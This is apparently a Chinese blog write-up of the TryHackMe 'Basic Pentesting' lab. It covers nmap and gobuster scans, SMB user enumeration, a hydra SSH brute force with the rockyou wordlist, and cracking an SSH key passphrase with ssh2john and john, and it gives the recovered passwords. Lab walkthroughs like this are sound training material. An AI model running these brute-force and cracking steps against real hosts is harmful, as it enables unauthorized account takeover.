来自tryhackme的 Basic Pentesting

开靶场IP:10.10.227.255

# nmap 端口扫描

PORT     STATE SERVICE     VERSION

22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)

80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))

139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)

8080/tcp open  http        Apache Tomcat 9.0.7

# gobuster 目录扫描

/.hta (Status: 403)

/.htaccess (Status: 403)

/.htpasswd (Status: 403)

/development (Status: 301)

/index.html (Status: 200)

/server-status (Status: 403)

在/development发现

#

2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat

to host that on this server too. Haven't made any real web apps yet, but I have tried that example

you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm

using version 2.5.12, because other versions were giving me trouble. -K

2018-04-22: SMB has been configured. -K

2018-04-21: I got Apache set up. Will put in our content later. -J

#

For J:

I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,

and I was able to crack your hash really easily. You know our password policy, so please follow

it? Change that password ASAP.

-K

根据提示工具 使用 SMB 查找用户名怎么样?

/root/Desktop/Tools/Miscellaneous/enum4linux.pl -a 10.10.227.255

S-1-22-1-1000 Unix User\kay (Local User)

S-1-22-1-1001 Unix User\jan (Local User)

得到用户名jan

使用hydra爆破ssh密码

hydra -t 4 -l jan -P /usr/share/wordlists/rockyou.txt 10.10.227.255 ssh

......等了很久大概有十分钟的样子

passwd:armando

按照提示使用LinEnum找到到登录的ssh

https://github.com/rebootuser/LinEnum(开箱即用)

/home/kay/.ssh/id_rsa

使用

ssh2john rsa_a.id_rsa >id_rsa_hash.txt

john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_hash.txt

破解密码为

beeswax(很快)

登录

ssh -i id_rsa kay@10.10.227.255

即可

Basic Pentesting的更多相关文章

  1. vulnhub writeup - 持续更新

    目录 wakanda: 1 0. Description 1. flag1.txt 2. flag2.txt 3. flag3.txt Finished Tips Basic Pentesting: ...

  2. Atitit HTTP 认证机制基本验证 (Basic Authentication) 和摘要验证 (Digest Authentication)attilax总结

    Atitit HTTP认证机制基本验证 (Basic Authentication) 和摘要验证 (Digest Authentication)attilax总结 1.1. 最广泛使用的是基本验证 ( ...

  3. Basic Tutorials of Redis(9) -First Edition RedisHelper

    After learning the basic opreation of Redis,we should take some time to summarize the usage. And I w ...

  4. Basic Tutorials of Redis(8) -Transaction

    Data play an important part in our project,how can we ensure correctness of the data and prevent the ...

  5. Basic Tutorials of Redis(7) -Publish and Subscribe

    This post is mainly about the publishment and subscription in Redis.I think you may subscribe some o ...

  6. Basic Tutorials of Redis(6) - List

    Redis's List is different from C#'s List,but similar with C#'s LinkedList.Sometimes I confuse with t ...

  7. Basic Tutorials of Redis(5) - Sorted Set

    The last post is mainly about the unsorted set,in this post I will show you the sorted set playing a ...

  8. Basic Tutorials of Redis(4) -Set

    This post will introduce you to some usages of Set in Redis.The Set is a unordered set,it means that ...

  9. Basic Tutorials of Redis(3) -Hash

    When you first saw the name of Hash,what do you think?HashSet,HashTable or other data structs of C#? ...

  10. Basic Tutorials of Redis(2) - String

    This post is mainly about how to use the commands to handle the Strings of Redis.And I will show you ...

随机推荐

  1. protobuf 详解

    protobuf protobuf概述 protobuf简介 Protobuf是Protocol Buffers的简称,它是Google公司开发的一种数据描述语言,是一种轻便高效的结构化数据存储格式, ...

  2. 中英文拼写检测纠正开源项目使用入门 word-checker 1.1.0

    项目简介 word-checker 本项目用于单词拼写检查.支持英文单词拼写检测,和中文拼写检测. 特性说明 可以迅速判断当前单词是否拼写错误 可以返回最佳匹配结果 可以返回纠正匹配列表,支持指定返回 ...

  3. 使用kubeadm快速启用一个集群

    使用kubeadm快速启用一个集群 CentOS 配置YUM源 cat <<EOF > /etc/yum.repos.d/kubernetes.repo [kubernetes] n ...

  4. pandas之去重

    "去重"通过字面意思不难理解,就是删除重复的数据.在一个数据集中,找出重复的数据删并将其删除,最终只保存一个唯一存在的数据项,这就是数据去重的整个过程.删除重复数据是数据分析中经常 ...

  5. MordernC++之左值(引用)与右值(引用)

    左值与右值 C++中左值与右值的概念是从C中继承而来,一种简单的定义是左值能够出现再表达式的左边或者右边,而右值只能出现在表达式的右边. int a = 5; // a是左值,5是右值 int b = ...

  6. 多表查询和python操作mysql

    目录 多表查询的两种方法 方法1:连表操作 方法2:子查询 小知识点补充说明 可视化软件NaviCat 多表查询练习题 1.查询所有的课程的名称以及对应的任课老师姓名 2.查询平均成绩大于八十分的同学 ...

  7. JMeter-BeanShell预处理程序和BeanShell后置处理程序的应用

    一.什么是BeanShell? BeanShell是用Java写成的,一个小型的.免费的.可以下载的.嵌入式的Java源代码解释器,JMeter性能测试工具也充分接纳了BeanShell解释器,封装成 ...

  8. el-menu使用递归组件实现多级菜单组件

    1. 效果: 2. 实现: 创建外层菜单AsideMenu.vue组件和子菜单项AsideSubMenu.vue组件,在AsideSubMenu中进行递归操作. AsideMenu.vue文件内容如下 ...

  9. ubuntu容器的远程xface桌面环境搭建

    一.container: ubuntu20.04 二.commands: apt install xfce4 tigervnc-standalone-server  # xface使用gdm3启动器 ...

  10. 笔记:linux必备网络基础概念和以太网技术基础

    笔记:linux必备网络基础概念和以太网技术基础 由于后面可能需要对交换机进行一些配置,所以也是临时学习一下iptables的相关配置,以及一些基本的网络知识,下面就是我看到一些资料做的一些总结,希望 ...